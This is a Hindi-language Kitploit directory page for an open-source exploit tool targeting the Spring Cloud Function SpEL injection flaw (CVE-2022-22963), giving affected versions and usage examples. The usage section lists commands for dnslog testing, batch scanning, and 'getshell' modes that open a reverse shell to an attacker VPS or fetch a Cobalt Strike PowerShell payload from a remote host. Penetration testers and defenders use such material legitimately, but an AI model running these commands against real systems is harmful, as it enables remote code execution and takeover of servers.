Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
spring-cloud-function-rce — Spring Cloud Function SPEL अभिव्यक्ति इंजेक्शन भेद्यता(CVE-2022-22963) | Kitploit
उपकरण/GitHubGitHub/k3rwin/spring-cloud-function-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubk3rwin/spring-cloud-function-rce

spring-cloud-function-rce

Spring Cloud Function SPEL अभिव्यक्ति इंजेक्शन भेद्यता(CVE-2022-22963)

रिपॉजिटरी देखें
834 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Spring Cloud Function SPEL एक्सप्रेशन इंजेक्शन भेद्यता (CVE-2022-22963)

स्प्रिंग फ्रेमवर्क आधुनिक जावा-आधारित एंटरप्राइज़ अनुप्रयोगों (किसी भी प्रकार के डिप्लॉयमेंट प्लेटफॉर्म पर) के लिए एक व्यापक प्रोग्रामिंग और कॉन्फ़िगरेशन मॉडल प्रदान करता है।

स्प्रिंग क्लाउड में सर्वरलेस फ्रेमवर्क स्प्रिंग क्लाउड फंक्शन के RoutingFunction क्लास की apply विधि, रिक्वेस्ट हेडर में मौजूद "spring.cloud.function.routing-expression" पैरामीटर को Spel एक्सप्रेशन के रूप में प्रोसेस करती है, जिससे Spel एक्सप्रेशन इंजेक्शन होता है। हमलावर इस भेद्यता के माध्यम से मनमाना कोड निष्पादित कर सकते हैं।

प्रभावित दायरा: 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

स्क्रिप्ट केवल सीखने के उद्देश्य से है; अन्य उपयोगों से उत्पन्न होने वाली कानूनी ज़िम्मेदारी लेखक से पूरी तरह असंबद्ध है

1.installation(मॉड्यूल इंस्टॉल करें)

root@kitploit:~
pip3 install -r requirements.txt	

2.Usage(उपयोग)

python3 spring-cloud-function-rce.py -h

image-20220414184058525

-u किसी एकल url पर dnslog परीक्षण निर्दिष्ट करें

-e रिवर्स शेल मोड निर्दिष्ट करें

-s टार्गेट होस्ट का ऑपरेटिंग सिस्टम निर्दिष्ट करें, डिफ़ॉल्ट linux है, पैरामीटर win/linux हैं -i और -c पैरामीटर के साथ उपयोग करें

3.example(उपयोग उदाहरण)

3.1 एकल url परीक्षण

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/"

image-20220414184202055

3.2 बैच url परीक्षण

python3 spring-cloud-function-rce.py -f "urls.txt"

image-20220414184424640

  • 123.58.236.76:47874 vulfocus का डॉकर टार्गेट रेंज है, जिसमें nslookup कमांड इंस्टॉल नहीं है, इसलिए dnslog परीक्षण विफल हो जाता है
  • बैच url पते वेबसाइट की रूट डायरेक्टरी होने चाहिए। http://192.168.50.222:8080/ स्थानीय रूप से बनाए गए टार्गेट रेंज की रूट डायरेक्टरी है। test डायरेक्टरी जोड़ने से poc विफल हो जाएगा

3.3 linux टार्गेट मशीन पर getshell

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -i "vps的ip地址:5566"

image-20220414185231029

3.4 windows टार्गेट मशीन पर getshell

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -s "win" -c "http://vps/a"

-c cs द्वारा जनरेट किए गए powershell ऑनलाइन कोड का पता निर्दिष्ट करता है, इसे -s "win" के साथ उपयोग किया जाना चाहिए। -c विकल्प के लिए स्क्रिप्ट को windows पर चलाना आवश्यक है; स्क्रिप्ट poc एन्कोडिंग के लिए powershell को कॉल करेगी

image-20220414185711222

image-20220414190020294

4. टार्गेट रेंज

4.1 IDEA से स्वयं सेटअप करें

संदर्भ पता

4.2 docker टार्गेट रेंज

vulfocus

image-20220414190509578

टूल डाउनलोड करें